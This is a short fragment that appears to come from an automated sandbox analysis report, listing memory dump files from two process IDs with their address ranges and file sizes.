                                                                                                                                                        • memory/4884-165-0x0000000003F00000-0x0000000003F22000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          136KB

                                                                                                                                                        • memory/4884-164-0x0000000004160000-0x0000000004788000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          6.2MB

                                                                                                                                                        • memory/4884-166-0x0000000003FA0000-0x0000000004006000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          408KB

                                                                                                                                                        • memory/4884-167-0x0000000004890000-0x00000000048F6000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          408KB

                                                                                                                                                        • memory/4884-168-0x0000000004EC0000-0x0000000004EDE000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          120KB

                                                                                                                                                        • memory/5060-159-0x0000000010000000-0x0000000010D78000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          13.5MB